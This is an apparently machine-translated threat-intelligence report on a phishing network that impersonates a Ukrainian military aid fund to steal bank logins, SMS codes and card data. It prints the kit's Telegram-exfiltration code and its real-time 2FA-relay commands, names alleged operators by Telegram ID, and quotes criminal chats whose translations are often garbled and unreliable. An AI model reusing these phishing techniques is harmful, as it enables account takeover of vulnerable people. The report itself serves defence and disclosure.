返回新闻
“活跃威胁”——调查报告

军事援助钓鱼网络曝光: 5家银行成为目标,运营者身份已查明

PhishDestroy 的自动化 Pipeline 在几分钟内就对一起冒充乌克兰军事援助基金会的网络钓鱼行动进行了全面剖析——从域名注册到操作者身份识别。

2026年3月25日 PhishDestroy 研究 阅读时间 12 分钟
截图 1 — 调查概述:dopomogvoina[.]sbs 钓鱼网络以乌克兰退伍军人为攻击目标。
5
银行成为攻击目标
3
已识别的操作员
6
用于解除屏蔽的 API 调用
2
并行网络钓鱼项目
<30
几分钟即可完成全面分析
赞助商披露( 点击展开 )
介绍本次调查的官方赞助商
🏆 NiceNIC 国际集团有限公司 🏆
权威的 登记处 与Netcraft合作 (通过欺骗其系统)· 该机构的官方域名供应商 Kraken 毒品交易平台 · 批量折扣供应商 · 的忠实追随者 “典型的骗子” VK社区——但至今仍未购买匿名课程
⭐ 1.8
Trustpilot
评分
$200
.ru 价格
120₽ 实际
0
滥用报告
已处理
15,000%
域名
标记
  • 尽管自称是“中国人”(香港),但该创作者来自 戈尔洛夫卡,顿涅茨克人民共和国. 中文品牌标识纯属装饰性——就像他们的《服务条款》一样
  • 维护 俄语支持 通过VKontakte和Telegram销售 .ru 当reg.ru收费时,价格为200美元 120₽ (~$1.30)
  • Trustpilot 上提及以下内容的负面评论 毒品交易网站域名 神秘地消失了。是巧合吗?绝对不是。
  • 某网站的活跃订阅者 “典型的骗子” (典型的诈骗分子)VK社区——当你的域名注册商关注诈骗群组时,你就知道他们的目标受众是谁了
  • 与……合作 Netcraft 仅够避免被下架,同时维持用于网络钓鱼、赌博和毒品相关域名的基础设施

与此同时,在《典型骗子》节目中:

原文(俄语)
翻译(英语)
对赞助商的承诺: 当“Типичный Мошенник”发布的这篇帖子成为现实时——根据我们目前掌握的情况,这只是时间问题 当……时, 而不是 如果 ——我们整个团队都会在VKontakte上注册并关注该社区。就当这是我们献上的热烈掌声吧。👏

* 本文为讽刺作品。NiceNIC 并未赞助此次调查。不过,正是由于他们拒绝在超过 5 天的时间内对我们的滥用报告采取行动,才使得此次调查成为必要。以上所述内容均基于公开信息和我们的运营经验。 阅读我们关于NiceNIC的完整调查报道 →

PhishDestroy 的发现

2026年3月20日,PhishDestroy的自动化威胁检测Pipeline标记了 dopomogvoina[.]sbs — 一个新注册的域名,托管着一个冒充……的钓鱼网站 “守护者的盾牌” (“捍卫者之盾”),一个伪造的乌克兰军事援助基金会。该网站以乌克兰退伍军人、战斗伤员及阵亡将士家属为目标,以提供政府财政援助为幌子,实则窃取乌克兰五大银行的银行登录凭证。

以下是对我们的自动化分析所发现的所有内容的完整剖析:社会工程学手段、技术基础设施、实时操作控制系统,以及运营该系统的相关人员的身份。

影响评估
该网站专门针对最脆弱的群体:患有创伤后应激障碍(PTSD)的退伍军人、寻求政府援助的阵亡士兵家属,以及在复杂的官僚体系中艰难求助的伤残军人。每被盗取一组凭证,都可能导致账户在几分钟内被完全接管。

第1节:诱饵——虚假的军事援助基金会

该域名 dopomogvoina[.]sbs 于2026年3月20日通过 NiceNIC国际集团有限公司,这是一家有据可查、在处理滥用投诉方面反应迟缓甚至完全不作为的域名注册商。该 .sbs TLD(并行部署)是一种低成本的通用顶级域名(gTLD),常被用于搭建一次性网络钓鱼基础设施。

该网站自诩为一个专业的、与政府相关的援助门户网站。页眉处满是乌克兰国旗,军事图像增添了真实感,页面内容用乌克兰语精心撰写,采用的官僚式措辞与正规政府项目如出一辙。

dopomogvoina 钓鱼网站主页显示了一个虚假的军事援助基金会
截图 5 —— 冒充“Щит Захисника”(守护者之盾)的钓鱼网站登录页面。

为了建立可信度,运营商在登录页面上醒目地展示了一个虚假的统计计数器:

  • 2,847份申请 ——这意味着已有数千人获得了援助
  • 已分发₴47.2M — 一个在UAH中看似庞大却令人信服的数字
  • 19 个项目 — 这表明这是一项全面、涉及多个项目的行动

这些数字完全是捏造的,被硬编码到页面源代码中,与后端没有任何关联。它们只有一个目的:通过“社会证明”来消除受害者的犹豫。

第2节:陷阱——5家银行,一个目标

点击“Подати заявку”(提交申请)后,受害者会看到一个银行选择界面。界面中列出了乌克兰五家最大的零售银行作为选项,每家银行都显示其官方品牌名称和徽标。此时,社会工程学手段便从情感操控转向了技术盗窃。

显示5家乌克兰银行的银行选择界面
截图 6 — 银行选择界面。每个选项都会触发一套定制的凭证窃取流程。

对该网站 JavaScript 打包文件的分析显示,每家银行都有一个 独特的多步骤凭证窃取流程, 根据该银行的实际身份验证流程量身定制:

PrivatBank

登录密码PIN短信

monobank

登录PIN短信电子邮件

奥沙德银行

登录验证短信

PUMB

登录短信

乌克兰西伯银行

登录PIN短信

每家银行的攻击流程都遵循相同的模式:

虚假援助页面
银行选择
登录克隆
双因素认证拦截
账户被劫持
PrivatBank 假冒登录页面
截图 7 — 克隆的 PrivatBank 登录界面。
伪造的PUMB登录页面
截图 9 — 克隆的 PUMB 登录界面。
攻击流程图,展示了从虚假援助页面到账户被劫持的网络钓鱼各阶段
截图 10 — 完整的攻击流程:从虚假军事援助页面开始,经由银行选择,直至凭证窃取和账户接管。

技术栈: React 单页应用 前端通过以下方式交付 Cloudflare CDN,带有 Express.js 后端负责处理凭证外泄。React 架构支持无缝的多步骤表单,其操作体验与正规银行界面几乎毫无二致。

第3节:操作员实时控制

这并非一个仅使用静态数据库的简单凭证窃取工具。该网络钓鱼工具包包含一个 实时 WebSocket 控制面板 这使得人工操作员能够实时操控每个受害者的会话。

位于 wss://dopomogvoina[.]sbs/ws 支持以下消息类型:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

这种实时控制意味着操作员可以:

  • 强制进入等待状态 — 在他们登录受害者的真实银行账户时,显示“正在处理您的申请...”
  • 重定向到特定步骤 — 如果第一个短信验证码已过期,请重新请求一个
  • 显示虚假错误信息 — 显示“代码无效,请重新输入”以获取多个双因素认证令牌
  • 提出自定义问题 — 在会话过程中请求出生日期、卡号或任何其他数据
这为什么危险
实时操作员控制能够绕过基于时间的双因素认证(2FA)保护。操作员截获短信验证码,并在其有效期内(通常为30至120秒)使用该验证码,而受害者此时只能盯着一个虚假的“处理中”动画。
假冒银行登录页面上的电话号码输入表单
截图 8 — 用于发起凭证盗取的电话号码输入表单。
基于 WebSocket 的操作员控制面板
截图 11 — 操作员用于控制受害者会话的实时机器人控制面板。

每次会话中被窃取的全部数据包括: phone, password, PIN, SMS code, card number, date of birth,以及 email.

第4节:Cloudflare幕后——两个项目,一台服务器

Cloudflare 的代理服务隐藏了源服务器,但 PhishDestroy 的基础设施 Pipeline 成功解析出了真实的源 IP: 45.131.214[.]148,托管于 RapidSeedbox / LeaseWeb 在荷兰。

一个关键细节: dopomogvoina[.]sbs 是通过……代理的 Cloudflare,从而隐藏了其源IP地址。但我们的系统也会追踪 hlpforvpeople[.]sbs — 一个通过同一NiceNIC注册商注册的、模式相匹配的相关域名。该域名是 并非由 Cloudflare 提供支持,直接暴露了其源IP地址: 45.131.214[.]148.

直接连接到该 IP 地址——不通过 Host 标题——揭示了一个出人意料的事实:一个 一个完全不同的钓鱼网站. 该默认虚拟主机提供的内容并非乌克兰军事援助,而是 “医疗保险卡”,这是一起针对印尼健康保险的网络钓鱼诈骗活动。服务器相同,受害者却截然不同,且发生在完全不同的国家。

同一台服务器,同一批操作者,不同的受害者
  • 项目 1: 乌克兰军事援助 → 窃取退伍军人的银行账户凭证
  • 项目 2: 印尼医疗保险 → 窃取公民的医疗信息
  • 相同的 Express.js 技术栈,相同的 WebSocket 实时控制面板
  • 相同的 BT-Panel(宝塔)服务器管理界面
  • 第二个项目的 C2 域: rezervtemka[.]cc — PhishDestroy 威胁数据库中已识别的一个已知网络钓鱼控制面板
  • 俄语评论 印尼项目的源代码中证实了这些同样基于CIS的开发者
同一台服务器上运行着两个网络钓鱼项目——乌克兰军事援助和印尼医疗保险
截图 12 —— 两起并行的网络钓鱼活动共享同一源服务器:乌克兰军事援助(dopomogvoina)和印尼医疗保险(HealthCare ID)。

印尼网络钓鱼模板是一个 PhishDestroy 威胁情报数据库中记录的已知套件. 我们已经看到这种模板的变体在东南亚各地被部署——目标是印尼、泰国和越南的金融机构。攻击者只需更换针对特定国家的模板,同时复用相同的后端基础设施。

肆无忌惮的罪犯
这就是现代网络钓鱼活动的现实: 这些不法分子根本不在乎他们从谁那里偷东西. 寻求军事援助的乌克兰退伍军人、购买健康保险的印尼工人——目标会根据哪种模板能带来最高收益而不断变化。同一批讲俄语的运营者通过同一台服务器同时运行这两项活动,在不同国家的受害者之间切换,就像换电视频道一样。今天是乌克兰银行。 明天可能就是以色列银行——正如博尼亚早在2026年3月就曾询问过的那样。

第 5 节:那个暴露了一切的 config.json 文件

下面将一步步详细说明,一个配置错误的文件是如何导致整个操作陷入混乱的。

在确定源服务器的第二个项目后,PhishDestroy的 JS 分析器 ——我们的自动化 JavaScript 智能分析工具——将分析目标对准了位于 https://45.131.214[.]148/assets/index-ZMQxHb_h.js. 该分析工具从这个 335KB 的 JavaScript 文件中提取了所有 API 端点、外部 URL 和配置路径。发现的内容包括:

  • Five API endpoints at rezervtemka[.]cc — 用于凭证验证的 C2 面板
  • wss://rezervtemka[.]cc
  • 集成 Facebook Pixel 以追踪受害者
  • 对……的引用 /config.json — 运行时加载,用于 Telegram 机器人配置

根据这一线索,我们获取了 /config.json 来自源IP。该文件无需任何身份验证即可访问——位于Web根目录下,任何人都可以读取:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

/config.json 该文件可直接从源IP访问—— 没有身份验证,没有访问控制,只是一个位于Web根目录下的普通JSON文件:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Telegram 机器人的令牌既是用户名也是密码。任何拥有该令牌的人都可以以该机器人的身份调用 API。运营者将他们的令牌保存在了一个公开可访问的文件中。 经过六次API调用后,我们已经获得了所有数据:

getMe — 机器人身份:“MonettiCRM”(@MonettiCRM_bot)
getChat(chat_id) — 群组名称:“Idr card”,附带一个有效的邀请链接
getChatAdministrators — 3 名管理员,包括群主
getChat(creator_id) — 创作者: @monettiescobar, Telegram Premium, 企业主页, 时区 UTC+3
getChat(admin2_id) — 第二位管理员:个人资料为空,疑似小号
getChatMemberCount — 操作员组共有 5 名成员
OSINT 链,展示了从 config.json 到完整操作员身份识别的 6 次 Telegram API 调用
截图 13 — 完整的 OSINT 链:仅需 6 次 API 调用,即可从暴露的 config.json 文件追踪到操作员的完整身份信息。

仅凭一个配置错误的文件,便通过六个HTTP请求成功识别出所有操作员身份。无需利用漏洞,也未进行任何未经授权的访问——仅仅是通过使用操作员自己暴露在外的令牌,调用标准的Telegram机器人API接口即可。

第6节:操作员

关于犯罪创造力的注记

接下来将展示一个关于糟糕别名选择的典型案例。我们有 莫内蒂·埃斯科巴 ——毕竟,没有什么比以历史上最著名的毒枭的名字给自己命名更能体现“低调”了。还有就是 博尼亚,又名 PapaZakonVor (字面意思是“法律认定的‘爸爸-小偷’”——这是对俄罗斯犯罪等级制度的一种模仿), 蟒蛇,以及 bubullikk. 最后 德沃伊斯,其昵称是 @devosus 这看起来很像“dev ops us”——一位将职位名称写进用户名的开发者。这些人曾以为自己能骗过自动化威胁情报系统。剧透:他们没能得逞。

Telegram运营商群组“Idr card”因机器人令牌而曝光
截图 14 —— 通过泄露的机器人令牌曝光的“Idr card” Telegram 运营者群组。
MONETTI ESCOBAR 的 Telegram 头像
所有者/创作者
莫内蒂·埃斯科巴
@monettiescobar
Telegram ID:8135223234
Telegram Premium,企业账号
时区:UTC+3(独联体地区)
10条公开消息——严格遵守作战安全规定(OPSEC)
TraFFeeQ 聊天美杜莎 Google AdsDeepfakes 频道
Bonya 的 Telegram 头像
调度员 / 交通
博尼亚
@BoaCC159
Telegram ID:6242202706
别名:PapaZakonVor、Boa、bubullikk简体中文(大陆)
12个群组中共有261条消息
DC2 — 阿姆斯特丹,荷兰
CryptoGrabSTYX 市场Raven CCEMPIRE CHAT凤凰解决方案
开发人员 / 程序员
德沃伊斯
@devosus
Telegram ID:8213612730
网络钓鱼工具包开发者——运营人员称他为“程序员”
发现安全漏洞时被要求“考虑防御措施”
设计上力求将对公众的影响降至最低
手柄 @devosus ≈ “dev ops us”——以职位名称作为用户名
套件开发者基础设施安全

莫内蒂·埃斯科巴——老大

MONETTI 坚持严格的运营安全——仅 10 条公开消息 分为两个组。但这两个组的情况说明了一切: TraFFeeQ 聊天 (用于欺诈的流量套利), 美杜莎 Google Ads (黑帽 Google Ads),以及一个 Deepfakes 频道. 他的Telegram商业资料中写着“Есть предложение”(“有个提议”) — 公开宣传服务。UTC+3时区(与莫斯科/明斯克/基辅一致)以及全天候(24/7)的营业时间,证实了该平台以独联体地区为基地,全天候运营。

博尼亚——那个粗心的人

与MONETTI谨慎的作战安全措施不同,Bonya(原化名: PapaZakonVor — 大致可译为“DaddyThiefByLaw”)留下了大量数字痕迹—— 12个地下群组中共计261条消息. 他的聊天记录读起来就像一份犯罪履历:

博尼亚的原话(译自俄语)
  • “额定电流为2.0的保险丝”“不过是[银行安全]2.0版的网络钓鱼罢了” — 讨论钓鱼工具包与较新银行安全系统的兼容性
  • “很难找到好的掉落物”“很难找到靠谱的洗钱中介” — 物色协助套现的同伙
  • “去文化中心给我工作吧”“来我的呼叫中心工作吧” — 招聘操作员
  • “这里有人和以色列的银行打过交道吗?”“这里有人跟以色列银行合作过吗?” — 拓展至新目标(2026年3月)
  • “我没怎么看到关于芬克的标志”“没看到多少财务日志” — 讨论被盗凭证的质量
  • “如果1个代理对应1-2个银行账户”“仅代表1至2家银行” — 讨论银行欺诈的运营安全问题
  • “她的银行卡被ATM机吞了”“她的银行卡被ATM机吞了” ——一名洗钱中介从他们那里骗走了60,000₴,谎称ATM机吞卡了。就连罪犯也会被自己的同伙骗。

他所属的团体成员情况勾勒出一幅完整的图景: CryptoGrab (加密货币钱包盗取者), STYX 市场 (被盗数据的地下交易市场), Raven CC 验证工具 (信用卡验证工具), EMPIRE CHAT 以及 凤凰解决方案 (欺诈协调)。这并非初犯——此人早已深陷网络犯罪生态系统之中。

Devoys — 开发商

该行动的技术支柱。设计上力求将公开痕迹降至最低——当该组织遭到入侵时,博尼亚明确指名让他: “@devosus,趁我们还没被干得屁滚尿流,赶紧想想怎么防守吧”“@devosus,在咱们被打得落花流水之前,先想想防守吧。” 他对这一违规行为的讽刺性回应—— “当加入国际刑警组织时” (“何时进行插值”) — 这表明这并非他们第一次险些遭遇不测。

行为分析:261条消息解读

PhishDestroy 的 OSINT Pipeline 收集并翻译了 全部 261 条公开消息 来自Bonya的12个地下Telegram群组(2024年6月—2026年3月)。通过DeepL API进行机器翻译,并结合人工语境校正。这些消息揭示了一整套运作模式——下文按犯罪活动类型进行了分类。

消息分发情况:12个群组共261条消息
  • 💬ONE|聊天 — 91 条消息(诈骗协调)
  • 最新动态/验证 — 37 条消息(验证诈骗)
  • 劳力士 | 公共聊天室 — 28 条消息(卡片)
  • EMPIRE CHAT — 24 条消息(黑市)
  • Фбстор — 23 条消息(流量套利)
  • FB-DOC — 22 条消息(广告欺诈)
  • 凤凰解决方案 — 17 条消息(银行诈骗)
  • CryptoGrab — 11 条消息(加密资金被转移)
  • STYX 市场 — 2 条消息(地下交易市场)
  • Raven CC 验证工具 — 2 条消息(卡片核对)

银行诈骗与网络钓鱼

💬ONE|聊天2025年3月
“这里只有2.0个钓鱼网站”
这里还有额定电流为2.0的保险丝
探讨钓鱼工具包与最新银行安全协议的兼容性
💬ONE|聊天2025年3月
“兄弟,这里可不是在卖什么‘phish’,而是用‘phish’来支付。”
兄弟,这里不卖任何鱼,这里是用来支付的鱼。
区分“以出售为目的的网络钓鱼”与“以直接盗窃为目的的网络钓鱼”
凤凰解决方案2026年3月
“这里有没有人曾在以色列的银行工作过?”
这里有人和以色列的银行打过交道吗?
将业务扩展至以色列银行业——就在我们展开调查前的5天
劳力士 | 公共聊天室2024年9月
“如果只有1个代理,则仅限1-2家银行”
如果1个代理对应1-2个银行,那么电流
针对多银行欺诈的运营安全措施:每1-2家银行使用一个代理,以避免被发现
劳力士 | 公共聊天室2024年9月
“没看到多少财务日志”
我没怎么看到芬克的标志
对黑市上被盗银行凭证质量的抱怨

洗钱中介与套现

💬ONE|聊天2025年3月
“好东西可遇不可求”
很难找到好的掉落物
“Drops” = 负责将盗取资金套现的“洗钱中介”。抱怨招募困难。
💬ONE|聊天2025年3月
“来我的呼叫中心工作吧”
去文化中心跟我一起工作吧
积极招募人员加入诈骗呼叫中心运营
最新动态2024年6月
“我们被偷了6万”
我们被偷了60千
一名洗钱中介竟从诈骗犯手中盗走了60,000₴。真是讽刺的正义。
最新动态2024年6月
“他妈的,ATM机怎么会把卡吞了?”
他妈的,ATM机怎么会把卡吞进去啊
这名中间人声称自动取款机“吞”了银行卡,以此据为己有。骗子在骗骗子。
最新动态2024年6月
“她把钱转给了我们,但后来我们没有主要渠道来转移这笔钱”
她把这事推给了我们,而当时我们手头没有主要的资金来源来转账
描述套现链:受害人 → 中间账户 → 主要洗钱中介

流量欺诈与广告滥用

EMPIRE CHAT2026年3月
“我不用谷歌,只用脸书”
我不用谷歌,只用脸书
专门从事Facebook广告欺诈——将流量引导至钓鱼页面
FB-DOC2026年2月
“如果没有担保人,我也不会拿出广告费用的%来投入。”
如果没有担保,我也不会按支出的一定百分比进行投资。
就开展欺诈性Facebook广告活动协商付款条款
CryptoGrab2025年1月
“我试过在Facebook上用AML定位美国受众——但网上找不到任何合适的设置方案”
我试着在脸书上发帖,想找找关于美国的可靠信息,但在网上连一些靠谱的、甚至较早的资源都没找到。
企图利用Facebook广告针对美国受害者实施反洗钱诈骗
心理档案:博尼亚

这个包含261条消息的数据集揭示了…… 中级网络犯罪分子 业务范围广泛:银行钓鱼诈骗、洗钱网络、Facebook广告欺诈、加密货币盗取以及信用卡信息盗取。主要特征:

  • 操作疏忽 — 通过一个账号在公共群组中发布了261条消息。使用多个化名(PapaZakonVor → Boa → Bonya)表明其虽知晓行动安全(OPSEC)的重要性,但未能切实执行
  • 招聘思维 — 积极邀请人们“来我的呼叫中心工作”,并出售运营知识以换取现金
  • 对受害者的冷漠 ——以同样超然的态度讨论乌克兰、欧洲、以色列和美国的目标。地理位置只是这起欺诈案中的一个变量
  • 信任问题 ——被自己的“洗钱中介”出卖,损失了6万₴。讽刺的是,这恰恰反映了他自己在受害者心中制造的不信任感
  • 以扩张为驱动的 ——就在2026年3月,该组织还在积极开拓新的银行业务市场(以色列),这表明针对乌克兰的网络钓鱼攻击只是其同时进行的众多行动之一
Bonya:完整消息日志(12个群组共253条消息)
Bonya (@BoaCC159) — 完整翻译的消息记录
-- Phoenix Solution(16 条消息) --
B
博尼亚2026-03-17 14:22
这里有没有人曾在以色列的银行工作过?这里有人和以色列的银行打过交道吗?
B
博尼亚2026-03-17 14:22
也在默默地工作。我们也悄悄地干活
B
博尼亚2026-03-17 14:17
最近怎么样最近怎么样
B
博尼亚2026-03-17 14:17
大家好大家好
B
博尼亚2026-03-15 19:02
嗯,现在基本上都修好了。嗯,总的来说,一切都已经安排妥当了
B
博尼亚2026-03-15 19:02
嗯,这确实有点麻烦好吧,这确实有点麻烦
B
博尼亚2026-03-15 19:01
是啊,我最近也一直在默默干活,搞砸了。是啊,做这些默默无闻的工作也真够受的了
B
博尼亚2026-03-15 19:00
你今天休息得怎么样?周末过得怎么样
B
博尼亚2026-03-15 19:00
你们所有人。大家共同的
B
博尼亚2026-03-14 14:29
既然大家都知道那是马里克,他现在也就不再那么无名了。他已经算不上匿名了,毕竟大家都知道马里克是谁
B
博尼亚2026-03-14 14:24
重生重生
B
博尼亚2026-03-14 14:24
啊哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈啊哈哈哈哈哈哈哈哈哈
B
博尼亚2026-03-14 14:23
看到聊天室不见了,我感到很沮丧。看到聊天室不见了,我简直难过极了
B
博尼亚2026-03-14 14:22
我原以为再也找不到你了。我本来还以为找不着你们了
B
博尼亚2026-03-14 14:22
KooКу
B
博尼亚2026-03-14 14:22
Еба
-- 👨‍⚕️ FB-DOC — 流量仲裁聊天群(21条消息) --
B
博尼亚2026-03-15 07:23
@fbdoc21@fbdoc21
B
博尼亚2026-03-15 07:20
用你的鸡巴捶自己的额头。用鸡巴在自己额头上乱戳一通
B
博尼亚2026-03-06 15:18
就像在2.5😂的屏幕上显示5一样。截图里那5个简直太像2.5了😂2.5😂
B
博尼亚2026-02-19 17:05
致各位。祝大家
B
博尼亚2026-02-19 17:04
如果你成交了,我一定会笑的。如果你开仓,我就笑死
B
博尼亚2026-02-19 17:04
大陆的?大陆的?
B
博尼亚2026-02-19 17:04
看,她就在那里。看,她同意了
B
博尼亚2026-02-19 17:01
因此,在询问担保人时,一定要进行背景调查。所以,每次询问保修事宜时,请务必查看此处
B
博尼亚2026-02-19 17:00
他问了一下担保人的事,随即就消失了。有人问了关于担保人的事,随即就消失了
B
博尼亚2026-02-19 17:00
哎,卡琳娜嗨,卡琳娜
B
博尼亚2026-02-19 16:59
所以你是打算找个担保人吗?那你打算保底了吗?
B
博尼亚2026-02-19 16:57
如果没有担保人,我也不会按消费额的百分比来支付。如果没有担保,我也不会按支出的一定百分比进行投资。
B
博尼亚2026-02-19 16:57
我?我?
B
博尼亚2026-02-19 16:57
哎,她发了一堆截图,而你却什么都没给我。她发了截图,而你什么都没发
B
博尼亚2026-02-19 16:56
看看她发来的截图看看她发来的截图
B
博尼亚2026-02-19 16:55
他没提到担保人吗?他没写关于担保人的事吗?
B
博尼亚2026-02-19 16:54
你真是个怪胎😂你这怪胎😂
B
博尼亚2026-02-19 16:53
你要求提供担保人。你向担保人求过情吗
B
博尼亚2026-02-19 16:52
其中在什么地方
B
博尼亚2026-02-17 14:37
谁能给这家店弄些好车来?谁能推荐个有好车的车友群?
B
博尼亚2026-02-17 12:10
无论你喜欢哪里,他们都会帮你搞定😂不管去哪儿,只要你愿意,他们都会帮你搞定😂
-- EMPIRE CHAT(24条消息)--
B
博尼亚2026-03-14 13:17
我已经想出办法了,但懒得解释。我已经明白了,但懒得解释了
B
博尼亚2026-03-14 13:17
不管怎样,他都会把你搞垮的。无论怎么说,他都会坑你
B
博尼亚2026-03-12 17:16
以不同的方式。各不相同
B
博尼亚2026-03-12 17:08
+ 而且现在正有大量风暴来袭。+ 现在风暴很猛
B
博尼亚2026-03-12 17:07
如果是黑色的,我敢打赌如果是黑方的话,我可能会打赌
B
博尼亚2026-03-12 17:07
这要看是什么样的提议,如果是“白”的话,那就行。要看是什么优惠,如果是白色的话,那就行
B
博尼亚2026-03-12 17:06
这简直是两个不同的世界两个截然不同的世界,这就是
B
博尼亚2026-03-12 17:06
没有别的了根本没有别的了
B
博尼亚2026-03-12 17:06
您可以将其设置为“仅限电脑”在那里可以设置为“仅限电脑”
B
博尼亚2026-03-12 17:05
谷歌并没有我想象的那么有效。在我看来,谷歌并没有那么有效
B
博尼亚2026-03-12 17:05
嗯,我不用谷歌,只用脸书。我不用谷歌,只用脸书
B
博尼亚2026-03-12 17:05
只要在整个过程中你得找到一个连字符就行。前提是还得把这些笨蛋全都捆在一起
B
博尼亚2026-03-12 17:04
“Rejects”和“ackeys”如风暴般纷至沓来。诸如此类。被拒的,账号就这样被封了,就像暴风雨一样。诸如此类
B
博尼亚2026-03-12 17:04
兄弟,事情可没那么简单。不,兄弟,这还不是全部,这只是开个头而已
B
博尼亚2026-03-12 17:03
所有常规航空采购,更值得信赖所有空气弹,普通气瓶,值得信赖
B
博尼亚2026-03-12 17:03
目前市场上没有一家好的中介公司。目前市场上没有好的中介公司
B
博尼亚2026-03-12 17:02
与其说是吓人,不如说是让人提心吊胆与其说可怕,不如说更让人紧张
B
博尼亚2026-03-12 17:02
加密货币、赌博的直觉和黑人身份,这一切都倾泻而出加密货币、赌博和黑料,全都涌来了
B
博尼亚2026-03-12 17:01
市政府采取的最后一项措施是入侵2d。最近在2D游戏中玩得最入迷的
B
博尼亚2026-03-12 17:01
攀爬——如果你从我自身或预算角度考虑,会发现2D攀爬需要花费1-2k zeles用于测试,而这些资金不会维持太久。如果想找,不管是我自己的还是用预算,要想找出适合2D的,得花1-2千泽拉做测试,而且它也活不了多久。
B
博尼亚2026-03-12 17:00
我正在倒酒我浇
B
博尼亚2026-03-12 16:59
(因为针对白人求职者没有此类要求)因为白标方案没有这类要求)
B
博尼亚2026-02-14 14:33
谁在AML测试中被标记为“dreiner”?只有在担保人被标记为“dep”或“ready”时才会出现这种情况谁有AML测试用的排气管?只限带储油罐的,或者已通过保修检测的
B
博尼亚2026-01-11 03:14
Facebook群组里有人,还有个朋友。需要补充Facebook资源,价格面议。有人在Facebook上发过帖,里面还有脏话。需要给Facebook充值,价格面议。
-- SТYХ СНAT [ STYXMARKET.ST ] (2 条消息) --
B
博尼亚2025-12-05 12:04
需要发票、Payzaty、Cashfree、Eportal 3ds需要发票、Payzaty、Cashfree、Eportal 3ds
B
博尼亚2025-11-22 11:14
有聊天担保人吗?这里有聊天管理员吗?
-- 流量仲裁聊天室(2条消息) --
B
博尼亚2025-11-24 14:50
100%100%
B
博尼亚2025-11-24 14:49
Tg频道将被劫持Telegram频道被劫持了
-- Raven CC 校对工具(2 条消息) --
B
博尼亚2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
博尼亚2025-11-21 21:18
/check/check
-- Vision Browser 聊天(2 条消息) --
B
博尼亚2025-11-14 16:47
谢谢。谢谢
B
博尼亚2025-11-14 16:47
vicen werk in ru?“Vizen Work”是俄语吗?
-- 💬ONE|聊天(86条消息) --
B
博尼亚2025-03-05 17:06
大家,推荐一家能买到护垫的店吧。伙计们,给个链接,说说哪里能找到这些场地
B
博尼亚2025-03-05 16:22
简直连“狂热”都形容不了只是连做个美甲都做不了
B
博尼亚2025-03-05 16:22
同样地同样
B
博尼亚2025-03-05 16:21
他妈的快告诉我,导师有没有和学生们的聊天群。他妈的,谁能告诉我导师有没有和学生们的聊天群?
B
博尼亚2025-03-05 16:10
还有,ts是谁?谁是楼主?
B
博尼亚2025-03-05 15:44
这并不难,但这里没有完整的说明书,只有教程。那儿并不难,但这里没有完整的教程,只有导师们的指导。
B
博尼亚2025-03-05 15:42
基本上,是的,如果你知道怎么做的话。说到底,如果你会的话,确实是这样
B
博尼亚2025-03-05 15:42
半天半天
B
博尼亚2025-03-05 15:42
第一个有600人,他没回复。对于前600人,他没有回应
B
博尼亚2025-03-05 15:41
如果你有钱的话,就买那个标价200美元的吧。如果手头有钱,就选那个要200美元的吧
B
博尼亚2025-03-05 13:55
谁最擅长教学?那里有学生聊天室吗?“谁在‘Fantastica’学习?那里有学生聊天群吗?”
B
博尼亚2025-03-03 15:10
支票收据
B
博尼亚2025-03-03 15:10
那个吸尘器正在吸尘的
B
博尼亚2025-03-03 15:10
明白了
B
博尼亚2025-03-03 15:10
可能还有用软件的妓女。不过这里肯定有带软件的妓女
B
博尼亚2025-03-03 15:09
那是一段……曾经
B
博尼亚2025-03-03 15:09
哦,这不错。哦,这还挺不错的
B
博尼亚2025-03-03 15:09
特里努里乌埃特·鲁鲁特里努里乌埃特·鲁鲁
B
博尼亚2025-03-03 15:09
而且这些正在被收集而这些被收集起来
B
博尼亚2025-03-03 15:09
蒂普就坐在那儿,他妈的还在拆包装纸那家伙正坐在那儿,一边吃着薯片一边胡扯
B
博尼亚2025-03-03 15:04
为什么会有乌克兰的车牌?П 为什么要使用乌克兰车牌号
B
博尼亚2025-03-03 15:03
我说“kc”。我说“kc”
B
博尼亚2025-03-03 15:03
我明白了。我明白了
B
博尼亚2025-03-03 15:03
如果情况很复杂,你就会弄丢你的圆顶礼帽。如果你在这里玩得不够嗨,你的锅就要飞走了
B
博尼亚2025-03-03 15:03
操,咱们来比比看,在我把面糊从锅里拿出来的时候,你能跑多少次FB Rekul。操,快给我个比较工具,看看你得重启几次Facebook,我这儿先把镜头移开
B
博尼亚2025-03-03 15:02
寻找一名陪护陪游
B
博尼亚2025-03-03 15:02
这帮家伙的举动简直像《奇奇车》里的情节一样,简直是个该死的混蛋。这帮作弊者的发展简直让人想操,真他妈的自慰狂
B
博尼亚2025-03-03 15:02
操,这里全是“觉醒主义者”。他妈的,这儿全是靠手动操作的工人
B
博尼亚2025-03-03 15:02
什么样的桌子有哪些桌子
B
博尼亚2025-03-03 15:01
如果你嗓音动听,30就是你的了。30 如果你声音动听,她们就会是你的
B
博尼亚2025-03-03 15:01
还有更多的钱那里的钱更多
B
博尼亚2025-03-03 15:01
来我的公司工作吧。去文化中心跟我一起工作吧
B
博尼亚2025-03-03 15:00
没有
B
博尼亚2025-03-03 14:59
PlategamПлатегам
B
博尼亚2025-03-03 14:59
+ 我不太会用回放功能+ 我对这些术语一窍不通
B
